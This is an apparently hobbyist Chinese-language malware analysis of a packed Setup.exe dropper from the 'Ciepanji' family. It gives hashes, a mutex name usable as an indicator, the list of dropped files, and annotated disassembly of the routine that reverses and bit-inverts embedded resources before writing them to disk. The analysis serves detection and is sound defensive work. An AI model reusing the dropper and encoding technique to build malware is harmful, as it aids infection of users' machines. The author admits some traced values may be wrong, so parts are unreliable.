文件: Setup.exe
大小: 159744 字节
修改时间: 2008年2月25日, 02:46:28
MD5: E4284D269C5FE7C4F3D1EF9D24AE2077
SHA1: F315C0DE3C095126ED1693F1EC6689F227FFA4E2
CRC32: 80A32F35
加壳:UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo(注:上面的 MD5/SHA1/CRC32 是加壳文件 Setup.exe 的散列;下面的反汇编从已解析出的导入表和 MFC CString 符号看应是脱壳后的代码,脱壳后文件的散列与上面不同,做特征匹配时要分清)
编写语言:Microsoft Visual C++ 6.0
写在前面:
花了几天时间,参考了几个高手的分析,才有了这个残篇,在这里表示感谢轩辕小聪(答阳光,关于pagefile_pif对付安全软件行为的实现举例),loveboom(熊猫烧香病毒分析及解决方案),孤独更可靠(磁碟机变种简单分析(lsass.exe、smss.exe、dnsq.dll、NetApi000.sys)),清新阳光(新年伊始警惕“磁碟机”新变种(LSASS.exe,SMSS.exe,netcfg.dll,pagefile.pif)(征集更好的查杀方法))
学习过程中还有很多东西不明不白,估计有不少地方跟出来的结果可能还是错的,只能慢慢来。虽然这只是残篇,权作自我激励吧,以下就是本篇的主要内容
1.CreateMutexA创建一个互斥量,判断病毒是否已经存在内存中。注意互斥量名 "CNJBlaipbofF" 是由两个分开存放的字面量 "CNJBla" 和 "ipbofF" 在运行时用 CString 拼接出来的,直接在字符串表里搜完整名字可能搜不到;这个互斥量名可以作为检测特征(IOC)使用
代码:
.text:004057FC 68 E0 C7 40 00 push offset s_Cnjbla ; "CNJBla"
.text:00405801 8D 4D 90 lea ecx, [ebp+var_70]
.text:00405804 C6 45 FC 3A mov byte ptr [ebp+var_4], 3Ah
.text:00405808 E8 C3 20 00 00 call CString::operator=(char const *)
.text:00405808
.text:0040580D 68 D8 C7 40 00 push offset s_Ipboff ; "ipbofF"
.text:00405812 8D 4D 90 lea ecx, [ebp+var_70]
.text:00405815 E8 CE 20 00 00 call CString::operator+=(char const *)
.text:00405815
.text:0040581A FF 75 90 push [ebp+var_70] ; lpName
.text:0040581D 6A 01 push 1 ; bInitialOwner
.text:0040581F 53 push ebx ; lpMutexAttributes
.text:00405820 FF 15 A4 90 40 00 call ds:CreateMutexA ; |pSecurity = NULL
.text:00405820 ; |InitialOwner = TRUE
.text:00405820 ; \MutexName = "CNJBlaipbofF"
.text:00405820
2.释放文件(有几个跟丢了 ^_^ )
病毒主要是读取自身 PE 资源里的数据,解码后释放成文件来害人。以下是资源和落地文件的对照(路径是分析机上观察到的值,C:\winnt\system32 是该机的系统目录;在 XP/2003 上通常是 C:\WINDOWS\system32。路径到底是写死的还是用系统目录 API 拼出来的,这段反汇编看不出来,需要另行核实)
代码:
\ResourceType = "sexe"
|ResourceName = C4=196号资源
|FileName = "C:\winnt\system32\com\smss.exe"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
\ResourceType = "sexa"
|ResourceName = C0=192号资源
|FileName = "C:\winnt\system32\com\netcfg.000"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
\ResourceType = "sexh"
|FileName = "C:\winnt\system32\com\lsass.exe"
(注:下面 dnsq.dll 也标为 "sexh",两处应有一处抄错,这一项的资源名也没跟到,以样本资源目录里的实际内容为准)
\ResourceType = "sexs"
|ResourceName = C2=194号资源
|FileName = "C:\NetApi000.sys"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
\ResourceType = "sexp"
|ResourceName = C1=193号资源
|FileName = "c:\pagefile.exe"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
\ResourceType = "sexh"
|ResourceName = C3=195号资源
|FileName = "C:\winnt\system32\dnsq.dll"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
具体实现的反汇编代码见下:FindResourceA 定位资源,SizeofResource 取资源大小,LoadResource/LockResource 取得资源数据指针,最后 WriteFile 写入目标文件。注意资源数据并不是原样写出:先把资源整块 memcpy 到一个缓冲区,再按字节倒序复制到第二个缓冲区(loc_4033A9 循环从末尾往前读、从开头往后写);如果倒序后的第一个字节是 0Dh,就把从第 2 个字节起的每个字节按位取反(loc_4033C4),并在写文件时跳过这个标志字节(缓冲区指针 +1,长度 -1);否则直接写出倒序后的数据。所以资源本身的散列和落地文件的散列不同,想从样本里静态提取落地文件时要先做这一步还原(倒序,必要时再按位取反)
代码:
..text:00403B42 68 C4 C6 40 00 push offset s_Sexe ; "sexe"
.text:00403B47 E8 CC 3D 00 00 call CString::CString(char const *)
.text:00403B47
.text:00403B4C 68 C4 00 00 00 push 0C4h ; hObject
.text:00403B51 51 push ecx ; lpFileName
.text:00403B52 8D 45 08 lea eax, [ebp+lpFileName]
.text:00403B55 8B CC mov ecx, esp
.text:00403B57 89 65 EC mov [ebp+var_14], esp
.text:00403B5A 50 push eax
.text:00403B5B C6 45 FC 01 mov byte ptr [ebp+var_4], 1
.text:00403B5F E8 72 3D 00 00 call CString::CString(CString const &)
.text:00403B5F
.text:00403B64 80 65 FC 00 and byte ptr [ebp+var_4], 0
.text:00403B68 8B CE mov ecx, esi
.text:00403B6A E8 99 F7 FF FF call process_resources
.text:00403308 process_resources proc near ; CODE XREF: sub_403B09+61p
.text:00403308 ; sub_403DF4+7B3p
.text:00403308 ; sub_403DF4+10DDp
.text:00403308 ; sub_403DF4+18A4p
.text:00403308 ; sub_403DF4+1DABp
.text:00403308
.text:00403308 NumberOfBytesWritten= dword ptr -14h
.text:00403308 hResData= dword ptr -10h
.text:00403308 var_C= dword ptr -0Ch
.text:00403308 var_4= dword ptr -4
.text:00403308 lpFileName= dword ptr 8
.text:00403308 hObject= dword ptr 0Ch
.text:00403308 lpType= dword ptr 10h
.text:00403308
.text:00403308 B8 84 81 40 00 mov eax, offset __ehhandler$?CreateNewChild@CMDIFrameWnd@@QAEPAVCMDIChildWnd@@PAUCRuntimeClass@@IPAUHMENU__@@PAUHACCEL__@@@Z
.text:0040330D E8 AE 46 00 00 call _EH_prolog
.text:0040330D
.text:00403312 51 push ecx
.text:00403313 51 push ecx
.text:00403314 53 push ebx
.text:00403315 56 push esi
.text:00403316 57 push edi
.text:00403317 33 FF xor edi, edi
.text:00403319 89 7D FC mov [ebp+var_4], edi
.text:0040331C 0F B7 45 0C movzx eax, word ptr [ebp+hObject]
.text:00403320 FF 75 10 push [ebp+lpType] ; lpType
.text:00403323 50 push eax ; lpName
.text:00403324 57 push edi ; hModule
.text:00403325 FF 15 64 90 40 00 call ds:FindResourceA ; |hModule = NULL
.text:00403325 ; |ResourceName = C4
.text:00403325 ; \ResourceType = "sexe"
.text:00403325 ;
.text:00403325
.text:0040332B 8B D8 mov ebx, eax
.text:0040332D 3B DF cmp ebx, edi
.text:0040332F 0F 84 CA 00 00 00 jz loc_4033FF
.text:0040332F
.text:00403335 53 push ebx ; hResInfo
.text:00403336 57 push edi ; hModule
.text:00403337 FF 15 70 90 40 00 call ds:SizeofResource ; |hModule = NULL
.text:00403337 ; \hResource = 0040F0C8
.text:00403337 ;
.text:00403337
.text:0040333D 53 push ebx ; hResInfo
.text:0040333E 57 push edi ; hModule
.text:0040333F 8B F0 mov esi, eax
.text:00403341 FF 15 68 90 40 00 call ds:LoadResource ; |hModule = NULL
.text:00403341 ; \hResource = 0040F188
.text:00403341
.text:00403347 3B C7 cmp eax, edi ; edi=00000000
.text:00403347 ; eax=00415890 (Setup.00415890)
.text:00403347 ;
.text:00403349 89 45 F0 mov [ebp+hResData], eax
.text:0040334C 0F 84 AD 00 00 00 jz loc_4033FF
.text:0040334C
.text:00403352 57 push edi ; hTemplateFile
.text:00403353 57 push edi ; dwFlagsAndAttributes
.text:00403354 6A 02 push 2 ; dwCreationDisposition
.text:00403356 57 push edi ; lpSecurityAttributes
.text:00403357 57 push edi ; dwShareMode
.text:00403358 68 00 00 00 40 push 40000000h ; dwDesiredAccess
.text:0040335D FF 75 08 push [ebp+lpFileName] ; lpFileName
.text:00403360 FF 15 E0 90 40 00 call ds:CreateFileA ; |FileName = "C:\winnt\system32\com\smss.exe"
.text:00403360 ; |Access = GENERIC_WRITE
.text:00403360 ; |ShareMode = 0
.text:00403360 ; |pSecurity = NULL
.text:00403360 ; |Mode = CREATE_ALWAYS
.text:00403360 ; |Attributes = 0
.text:00403360 ; \hTemplateFile = NULL
.text:00403360
.text:00403366 3B C7 cmp eax, edi ; edi=00000000
.text:00403366 ; eax=000001AC
.text:00403366 ;
.text:00403368 89 45 0C mov [ebp+hObject], eax
.text:0040336B 0F 84 8E 00 00 00 jz loc_4033FF
.text:0040336B
.text:00403371 8B 1D 70 93 40 00 mov ebx, ds:malloc
.text:00403377 56 push esi ; Size=1001 (4097.)
.text:00403378 FF D3 call ebx ; malloc
.text:00403378
.text:0040337A 56 push esi ; Size
.text:0040337B 8B F8 mov edi, eax
.text:0040337D FF D3 call ebx ; malloc
.text:0040337D
.text:0040337F 59 pop ecx
.text:00403380 8B D8 mov ebx, eax
.text:00403382 85 FF test edi, edi
.text:00403384 59 pop ecx
.text:00403385 74 76 jz short loc_4033FD
.text:00403385
.text:00403387 85 DB test ebx, ebx
.text:00403389 74 72 jz short loc_4033FD
.text:00403389
.text:0040338B 56 push esi ; Size= 1001 (4097.)
.text:0040338C FF 75 F0 push [ebp+hResData] ; hResData=Handles = 415890 (4282512.)
.text:0040338F FF 15 6C 90 40 00 call ds:LockResource
.text:0040338F
.text:00403395 50 push eax ; Src=Setup.00415890
.text:00403396 53 push ebx ; Dst=00348060
.text:00403397 E8 3C 46 00 00 call memcpy ; |dest = 00348060
.text:00403397 ; |src = Setup.00415890
.text:00403397 ; \n = 1001 (4097.)
.text:00403397 ;
.text:00403397
.text:0040339C 83 C4 0C add esp, 0Ch
.text:0040339F 33 C9 xor ecx, ecx
.text:004033A1 85 F6 test esi, esi
.text:004033A3 76 0F jbe short loc_4033B4
.text:004033A3
.text:004033A5 8D 44 33 FF lea eax, [ebx+esi-1]
.text:004033A5
.text:004033A9
.text:004033A9 loc_4033A9: ; CODE XREF: process_resources+AAj
.text:004033A9 8A 10 mov dl, [eax] ; ds:[00349060]=0D (Carriage Return)
.text:004033A9 ; dl=01
.text:004033A9 ;
.text:004033AB 88 14 39 mov [ecx+edi], dl ; dl=0D (Carriage Return)
.text:004033AB ; ds:[01208470]=0D (Carriage Return)
.text:004033AE 41 inc ecx
.text:004033AF 48 dec eax
.text:004033B0 3B CE cmp ecx, esi
.text:004033B2 72 F5 jb short loc_4033A9
.text:004033B2
.text:004033B4
.text:004033B4 loc_4033B4: ; CODE XREF: process_resources+9Bj
.text:004033B4 33 C0 xor eax, eax
.text:004033B6 80 3F 0D cmp byte ptr [edi], 0Dh
.text:004033B9 75 16 jnz short loc_4033D1
.text:004033B9
.text:004033BB 6A 01 push 1
.text:004033BD 59 pop ecx
.text:004033BE 3B F1 cmp esi, ecx
.text:004033C0 8B C1 mov eax, ecx
.text:004033C2 76 0D jbe short loc_4033D1
.text:004033C2
.text:004033C4
.text:004033C4 loc_4033C4: ; CODE XREF: process_resources+C7j
.text:004033C4 8A 14 39 mov dl, [ecx+edi]
.text:004033C7 F6 D2 not dl
.text:004033C9 88 14 39 mov [ecx+edi], dl
.text:004033CC 41 inc ecx
.text:004033CD 3B CE cmp ecx, esi
.text:004033CF 72 F3 jb short loc_4033C4
.text:004033CF
.text:004033D1
.text:004033D1 loc_4033D1: ; CODE XREF: process_resources+B1j
.text:004033D1 ; process_resources+BAj
.text:004033D1 8D 4D EC lea ecx, [ebp+NumberOfBytesWritten]
.text:004033D4 6A 00 push 0 ; lpOverlapped=NULL
.text:004033D6 2B F0 sub esi, eax ; eax=00000001
.text:004033D6 ; esi=00001001
.text:004033D8 51 push ecx ; lpNumberOfBytesWritten=ecx=0012E098
.text:004033D8 ;
.text:004033D9 03 C7 add eax, edi ; edi=01208470
.text:004033D9 ; eax=00000001
.text:004033DB 56 push esi ; nNumberOfBytesToWrite=esi=00001000
.text:004033DC 50 push eax ; lpBuffer=eax=01208471
.text:004033DD FF 75 0C push [ebp+hObject] ; hFile=堆栈 ss:[0012E0B8]=000001AC
.text:004033E0 FF 15 90 90 40 00 call ds:WriteFile ; |hFile = 000001AC
.text:004033E0 ; |Buffer = 01208471
.text:004033E0 ; |nBytesToWrite = 1000 (4096.)
.text:004033E0 ; |pBytesWritten = 0012E098
.text:004033E0
.text:004033E6 57 push edi ; Memory
.text:004033E7 8B F0 mov esi, eax
.text:004033E9 FF 15 78 93 40 00 call ds:free
.text:004033E9
.text:004033EF 59 pop ecx
.text:004033F0 FF 75 0C push [ebp+hObject] ; hObject=堆栈 ss:[0012E0B8]=000001AC
.text:004033F3 FF 15 60 90 40 00 call ds:CloseHandle[